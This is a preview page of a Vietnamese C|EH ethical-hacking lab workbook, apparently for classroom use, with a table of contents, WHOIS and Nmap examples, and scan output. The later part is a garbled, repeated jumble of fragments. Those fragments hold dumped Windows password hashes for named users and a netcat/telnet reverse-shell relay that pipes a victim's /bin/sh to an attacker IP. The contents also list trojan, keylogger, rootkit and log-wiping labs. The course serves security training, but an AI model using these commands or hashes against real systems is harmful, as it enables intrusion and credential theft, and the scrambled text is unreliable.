Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống
1
/ 37 trang
THÔNG TIN TÀI LIỆU
Thông tin cơ bản
Định dạng
Số trang
37
Dung lượng
3,5 MB
Nội dung
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 1
Mc Lc
Bài 1: 3
FOOTPRINTING 3
I/ Gii thiu v Foot Print: 3
II/ Các bài thc hành: 3
Bài 1: Tìm thông tin v Domain 3
Bài 2: Tìm thông tin email 5
Bài 2: 7
SCANNING 7
I/ Gii thiu v Scanning: 7
II/ Các Bài thc hành 7
Bài thc hành 1: S dng Phn mm Nmap 7
Bài thc hành th 2: S dng phn mm Retina đ phát hin các vulnerabilities và tn
công bng Metaesploit framework 13
Bài 3: 18
SYSTEM HACKING 18
I/ Gii thiu System Hacking: 18
II/ Thc hành các bài Lab 18
Bài 1: Crack password nt b ni b 18
Bài 2: S dng chng trình pwdump3v2 khi có đc 1 user administrator ca
máy nn nhân đ có th tìm đc thông tin các user còn li 20
Bài Lab 3: Nâng quyn thông qua chng trình Kaspersky Lab 23
Bài Lab 4: S dng Keylogger 25
Bài Lab 5: S dng Rootkit và xóa Log file 27
Bài 4: 30
TROJAN và BACKDOOR 30
I/ Gii thiu v Trojan và Backdoor: 30
II/ Các bài thc hành: 30
Bài 1 S dng netcat: 30
Bài 2: S dng Trojan Beast và detect trojan 32
Mun s dng Trojan Beast, ta cn phi xây dng 1 file Server cài lên máy nn nhân, sau
đó file server này s lng nghe nhng port c đnh và t máy tn công ta s connect
vào máy nn nhân thông qua cng này. 32
Bài 3: S dng Trojan di dng Webbase 35
Bài 5: 38
CÁC PHNG PHÁP SNIFFER 38
I/ Gii thiu v Sniffer 38
Bài 6: 65
Tn Công t chi dch v DoS 65
I/ Gii thiu: 65
II/ Mô t bài lab: 67
Bài Lab 1: DoS bng cách s dng Ping of death. 67
Bài lab 2: DoS 1 giao thc không s dng chng thc(trong bài s dng giao thc
RIP) 69
Bài Lab 3: S dng flash đ DDoS 72
Bài 7: 74
Social Engineering 74
I/ Gii Thiu 74
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 2
II/ Các bài Lab: 74
Bài Lab 1: Gi email nc đính kèm Trojan 74
Bài 8: 77
Session Hijacking 77
I/ Gii thiu: 77
II/ Thc hin bài Lab 77
Bài 9: 80
Hacking Web Server 80
I/ Gii thiu: 80
II/ Thc Hin bài lab 80
Bài Lab 1: Tn công Web Server Win 2003(li Apache) 80
Bài lab 2: Khai thác li ng dng Server U 84
Bài 10: 85
WEB APPLICATION HACKING 85
I/ Gii thiu: 85
II/ Các Bài Lab 85
Bài Lab 1: Cross Site Scripting 85
Bài Lab 2: Insufficient Data Validation 86
Bài Lab 3: Cookie Manipulation 88
Bài Lab 4: Authorization Failure 89
Bài 11: 91
SQL INJECTION 91
I/ Gii thiu v SQL Injection: 91
II/ Thc Hành Bài Lab 94
Bài 12: 101
WIRELESS HACKING 101
I/ Gii Thiu 101
II/ Thc hành bài Lab: 101
Bài 13: 105
VIRUS 105
I/ Gii thiu: (tham kho bài đc thêm) 105
II/ Thc hành Lab: 105
Bài 1: Virus phá hy d liu máy 105
Bài 2: Virus gaixinh lây qua tin nhn 107
Bài 14: 111
BUFFER OVERFLOW 111
I/ Lý thuyt 111
II/ Thc hành: 118
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 3
Bài 1:
FOOTPRINTING
I/ Gii thiu v Foot Print:
ây là k thut giúp hacker tìm kim thông tin v 1 doanh nghip, cá nhân hay t
chc. Bn có th điu tra đc rt nhiu thông tin ca mc tiêu nh vào k thut này. Ví d
trong phn thc hành th 1 chúng ta áp dng k thut này tìm kim thông tin v mt
domain(ví d là
www.itvietnam.com
) và xem th email liên lc ca domain này là ca ai,
trong phn thc hành th 2 chúng ta truy tìm 1 danh sách các email ca 1 keywork cho trc,
phng pháp này hiu qu cho các doanh nghip mun s dng marketing thông qua hình
thc email v.v. Trong giai don này Hacker c gng tìm càng nhiu thông tin v doanh
nghip(thông qua các kênh internet và phone) và cá nhân(thông qua email và hot đng ca
cá nhân đó trên Internet), nu thc hin tt bc này Hacker có th xác đnh đc nên tn
công vào đim yu nào ca chúng ta. Ví d mun tn công domain
www.itvietnam.com
thì
Hacker phi bit đc đa ch email nào là ch cùa domain này và tìm cách ly password ca
email thông qua tn công mail Server hay sniffer trong mng ni b v.v. Và cui cùng ly
đc Domain này thông qua email ch này.
II/ Các bài thc hành:
Bài 1: Tìm thông tin v Domain
Ta vào trang
www.whois.net
đ tìm kim thông tin và đánh vào domain mình mun
tìm kim thông tin
Sau đó ta nhn đc thông tin nh sau:
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 4
Registrar Name : BlueHost.Com
Registrar Whois : whois.bluehost.com
Registrar Homepage: http://www.bluehost.com/
Domain Name: ITVIETNAM.COM
Created on : 1999-11-23 11:31:30 GMT
Expires on : 2009-11-23 00:00:00 GMT
Last modified on : 2007-07-30 03:15:11 GMT
Registrant Info: (FAST-12836461)
VSIC Education Corporation
VSIC Education Corporation
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax :
Email: jkow@itvietnam.com
Last modified: 2007-03-23 04:12:24 GMT
Administrative Info: (FAST-12836461)
VSIC Education Corporation
VSIC Education Corporation
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax :
Email: jkow@itvietnam.com
Last modified: 2007-03-23 04:12:24 GMT
Technical Info: (FAST-12785240)
Attn: itvietnam.com
C/O BlueHost.Com Domain Privacy
1215 North Research Way
Suite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax : +1.8017651992
Email: whois@bluehost.com
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 5
Last modified: 2007-04-05 16:50:56 GMT
Status: Locked
Ngoài vic tìm thông tin v domain nh trên, chúng ta có th s dng các tin ích
Reverse IP domain lookup đ có th xem th trên IP ca mình có bao nhiêu host chung vi
mình. Vào link sau đây đ s dng tin ích này.
http://www.domaintools.com/reverse-ip/
Vic tìm kim đc thông tin này rt cn thit vi Hacker, bi vì da vào thông tin s
dng chung Server này, Hacker có th thông qua các Website b li trong danh sách trên và
tn công vào Server t đó kim soát tt c các Website đc hosting trên Server.
Bài 2: Tìm thông tin email
Trong bài thc hành này, chúng ta s dng phn mm “1
st
email address spider” đ
tìm kim thông tin v các email. Hacker có th s dng phn mm này đ thu thp thêm thông
tin v mail, hay lc ra các đi tng email khác nhau, tuy nhiên bn có th s dng tool này
đ thu thp thêm thông tin nhm mc đích marketing, ví d bn cn tìm thông tin ca các
email có đuôi là @vnn.vn hay @hcm.vnn.vn đ phc cho vic marketing sn phm.
Ta có th cu hình vic s dng trang web nào đ ly thông tin, trong bài tôi s dng
trang google.com đ tìm kim.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 6
Sau đó đánh t khóa vnn.vn vào tag keyword
Sau đó chúng ta đã có đc 1 list mail nh s dng trng trình này.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 7
Bài 2:
SCANNING
I/ Gii thiu v Scanning:
Scanning hay còn gi là quét mng là bc không th thiu đc trong quá trình tn
công vào h thng mng ca hacker. Nu làm bc này tt Hacker s mau chóng phát hin
đc li ca h thng ví d nh li RPC ca Window hay li trên phm mm dch v web
nh Apache v.v. Và t nhng li này, hacker có th s dng nhng đon mã đc hi(t các
trang web) đ tn công vào h
thng, ti t nht ly shell.
Phn mm scanning có rt nhiu loi, gm các phm mm thng mi nh Retina,
GFI, và các phn mm min phí nh Nmap,Nessus. Thông thng các n bn thng mi có
th update các bug li mi t internet và có th dò tìm đc nhng li mi hn. Các phn
mm scanning có th giúp ngi qun tr tìm đc li ca h thng, đng th
i đa ra các gii
pháp đ sa li nh update Service patch hay s dng các policy hp lý hn.
II/ Các Bài thc hành
Bài thc hành 1: S dng Phn mm Nmap
Trc khi thc hành bài này, hc viên nên tham kho li giáo trình lý thuyt v các
option ca nmap.
Chúng ta có th s dng phn mm trong CD CEH v5, hay có th download bn mi
nht t website:
www.insecure.org
. Phn mm nmap có 2 phiên bn dành cho Win và dành
cho Linux, trong bài thc hành v Nmap, chúng ta s dng bn dành cho Window.
thc hành bài này, hc viên nên s dng Vmware và boot t nhiu h điu hành
khác nhau nh Win XP sp2, Win 2003 sp1, Linux Fedora Core, Win 2000 sp4,v.v.
Trc tiên s dng Nmap đ do thám th xem trong subnet có host nào up và các port
các host này m, ta s dng lnh Nmap –h đ xem li các option ca Nmap, sau đó thc hin
lnh “Nmap –sS 10.100.100.1-20”. Và sau đó đc kt qu sau:
C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard
Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
Interesting ports on 10.100.100.6:
Not shown: 1678 closed ports
PORT STATE SERVICE
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 8
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
23/tcp open telnet
42/tcp open nameserver
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
2105/tcp open eklogin
3389/tcp open ms-term-serv
8080/tcp open http-proxy
MAC Address: 00:0C:29:59:97:A2 (VMware)
Interesting ports on 10.100.100.7:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:95:A9:03 (VMware)
Interesting ports on 10.100.100.11:
Not shown: 1695 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:A6:2E:31 (VMware)
Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support
scanning your own machine (localhost) this way.
All 0 scanned ports on 10.100.100.13 are
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 9
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
Interesting ports on 10.100.100.20:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
1000/tcp open cadlock
5101/tcp open admdog
MAC Address: 00:15:C5:65:E3:85 (Dell)
Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds
Trong mng có tt c 7 host, 6 máy Vmware và 1 PC DELL. Bây gi bc tip theo ta
tìm kim thông tin v OS ca các Host trên bng s dng lnh “ Nmap –v -O ip address” .
C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7 (xem chi tit Nmap quét)
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:46 Pacific Standard
Time
Initiating ARP Ping Scan at 10:46
Scanning 10.100.100.7 [1 port]
Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:46
Completed Parallel DNS resolution of 1 host. at 10:46, 0.01s elapsed
Initiating SYN Stealth Scan at 10:46
Scanning 10.100.100.7 [1697 ports]
Discovered open port 1025/tcp on 10.100.100.7
Discovered open port 445/tcp on 10.100.100.7
Discovered open port 135/tcp on 10.100.100.7
Discovered open port 139/tcp on 10.100.100.7
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 10
Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports)
Initiating OS detection (try #1) against 10.100.100.7
Host 10.100.100.7 appears to be up good.
Interesting ports on 10.100.100.7:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:95:A9:03 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows 2003 Server SP1
OS Fingerprint:
OS:SCAN(V=4.20%D=8/2%OT=135%CT=1%CU=36092%PV=Y%DS=1%G=Y%M=000C
29%TM=46B2187
OS:3%P=i686-pc-windows-
windows)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=0)
OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS%O3=M5B4NW0NNT0
0%O4=M5B4NW0NNT0
OS:0NNS%O5=M5B4NW0NNT00NNS%O6=M5B4NNT00NNS)WIN(W1=FAF0%W2=F
AF0%W3=FAF0%W4=F
OS:AF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%T=80%W=FAF0%O=M5B4NW0NN
S%CC=N%Q=)T1(R=Y
OS:%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=
Z%A=S%F=AR%O=%RD
OS:=0%Q=)T3(R=Y%DF=N%T=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4NW0NNT
00NNS%RD=0%Q=)T4
OS:(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T
=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=
0%Q=)T7(R=Y%DF=N%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%TOS=0
%IPL=B0%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=S%T=80%T
OSI=Z%CD=Z%SI=S%
OS:DLI=S)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IPID Sequence Generation: Incremental
[...]... hacker :10 18:BCE739534EA4E445AAD3B435B 514 04EE:5E7599F673DF11D5C5C4D950F 5BF 015 7::: hao123 :10 20:58F907D1C79C344DAAD3B435B 514 04EE:FD03071D 413 08B58B9DDBC6D 5576D78D::: VSIC Education Corporation Trang 21 Giáo trình bài t p C|EH Tài li u dành cho h c viên haoceh :10 16:B3FF8763A6B5CE26AAD3B435B 514 04EE:7AD94985F28454259BF2A038 21 FEC8DB::: hicehclass :10 23:B2BEF1B1582C2DC0AAD3B435B 514 04EE:D 619 8C25F8420A93301A579 2398CF94C::: IUSR _11 3SSR3JKXGW3N :10 03:449 913 C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F483... IUSR _11 3SSR3JKXGW3N :10 03:449 913 C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F483 3ABFA52ADA9462::: IWAM _11 3SSR3JKXGW3N :10 04:44 310 05ABF401D86F92DBAC26FDFD3B8 :18 8AA6E0737F12D16 D60F8B64F7AE1FA::: lylam :10 12:EE94DC327C009996AAD3B435B 514 04EE:7A63FB0793A85C960A775497C9 D738EE::: quyen:500:A00B 919 4BEDB81FEAAD3B435B 514 04EE:5C800F13A3CE86ED2540DD4E 7331E9A2::: SUPPORT_388945a0 :10 01: NO PASSWORD*********************:F791B19C488F4260723561D4F484EA09::: tam :10 14:NO PASSWORD*********************:NO... Host Name Server 1 8 TCP:53 DOMAIN - Domain Name Server 1 9 TCP:80 WWW-HTTP - World Wide Web HTTP (Hyper Text Transfer Protocol) 1 10 TCP :13 5 RPC-LOCATOR - RPC (Remote Procedure Call) Location 1 Service 11 TCP :13 9 NETBIOS-SSN - NETBIOS Session Service 1 12 TCP:445 MICROSOFT-DS - Microsoft-DS 1 13 TCP :10 25 LISTEN - listen 1 14 TCP :10 26 NTERM - nterm 1 15 TCP :10 30 IAD1 - BBN IAD 1 16 TCP: 210 3 ZEPHYR-CLT... BBD9D5E18::: anhhaoceh :10 19:B26C623F5254C6A 311 F64391B17C6CDE:98A2C048C77703D54BD0E88 887EFD68E::: ASPNET :10 06:7CACBCC121AC203CD8652FE65BEA4486:7D34A6E7504DFAF453D4 21 3660AE7D35::: Guest:5 01: NO PASSWORD*********************:NO PASSWORD*********************::: hack :10 22:CCF 915 5E3E7DB453AAD3B435B 514 04EE:3DBDE697D 716 90A769204BEB12 283678::: hacker :10 18:BCE739534EA4E445AAD3B435B 514 04EE:5E7599F673DF11D5C5C4D950F... t n công (17 2 .16 .84 .1) , m 2 c a s netcat l n l t l ng nghe trên c ng 80 + c a s Netcat (1) C:\>nc -nvv -l -p 80 listennng on [any] 80 connect to [17 2 .16 .84 .1] from [17 2 .16 .84.2] 10 55 pwd ls -la _ + c a s Netcat (2) C:\>nc -nvv -l -p 25 listening on [any] 25 connect to [17 2 .16 .84 .1] from (UNKNOWN) [17 2 .16 .84.2] 10 56 / total 17 1 drwxr-xr-x 17 root root 4096 Feb 5 16 :15 drwxr-xr-x 17 root root... Registry Access Available 1 6 telnet service 1 7 DCOM Enabled 1 8 Windows RPC Cumulative Patch 8287 41 Remote 1 9 Windows RPC DCOM interface buffer overflow 1 10 Windows RPC DCOM multiple vulnerabilities 1 11 Apache 1. 3.27 0x1A Character Logging DoS 1 VSIC Education Corporation Trang 14 Giáo trình bài t p C|EH Tài li u dành cho h c viên 12 Apache 1. 3.27 HTDigest Command Execution 1 13 Apache mod_alias... finished: 1 IP address (1 host up) scanned in 12 .485 seconds Tuy nhiên ta có th nh n di n r ng ây là 1 Server ch y d ch v SQL và Web Server, bây gi ta s d ng l nh “ Nmap –v –p 80 sV 10 .10 0 .10 0 .16 ” xác nh version c a IIS C:\Documents and Settings\anhhao>nmap -p 80 -sV 10 .10 0 .10 0 .16 Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 11 : 01 Pacific Standard Time Interesting ports on 10 .10 0 .10 0 .16 : PORT... “pwdump3.exe 10 .10 0 .10 0.6 c;\hao2003sp0 quyen”, và nh p vào password c a user quyen Ta m file hao2003sp0 xem trong thông tin aaa :10 15:NO PASSWORD*********************:NO PASSWORD*********************::: anhhao :10 10:DCAF9F8B002C73A0AAD3B435B 514 04EE:A923FFCC9BE38EBF40A5782 BBD9D5E18::: anhhao1 :10 11: DCAF9F8B002C73A0AAD3B435B 514 04EE:A923FFCC9BE38EBF40A5782 BBD9D5E18::: anhhao2 :10 13:DCAF9F8B002C73A0AAD3B435B 514 04EE:A923FFCC9BE38EBF40A5782... công (17 2 .16 .84 .1) , dùng /bin/sh k t xu t: n máy dùng [root@nan_nhan /]# telnet 17 2 .16 .84 .1 80 | /bin/sh | telnet 17 2 .16 .84 .1 25 /bin/sh: Trying: command not found /bin/sh: Connected: command not found /bin/sh: Escape: command not found Trying 17 2 .16 .84 .1 Connected to 17 2 .16 .84 .1 Escape character is '^]' _ Telnet trên máy n n nhân s chuy n t t c nh ng gì mà chúng ta gõ vào trong c a s Netcat (1) -... Buffer Overflow 1 14 ApacheBench multiple buffer overflows 1 15 HTTP TRACE method supported 1 TOP 20 OPEN PORTS The following is an overview of the top 20 open ports on your network Rank Port Number Description Count 1 TCP:7 ECHO - Echo 1 2 TCP:9 DISCARD - Discard 1 3 TCP :13 DAYTIME - Daytime 1 4 TCP :17 QOTD - Quote of the Day 1 5 TCP :19 CHARGEN - Character Generator 1 6 TCP:23 TELNET - Telnet 1 7 TCP:42 . gaixinh lây qua tin nhn 10 7
Bài 14 : 11 1
BUFFER OVERFLOW 11 1
I/ Lý thuyt 11 1
II/ Thc hành: 11 8
Giáo trình bài tp C|EH Tài liu dành cho hc. 89
Bài 11 : 91
SQL INJECTION 91
I/ Gii thiu v SQL Injection: 91
II/ Thc Hành Bài Lab 94
Bài 12 : 10 1
WIRELESS HACKING 10 1
I/ Gii Thiu 10 1
II/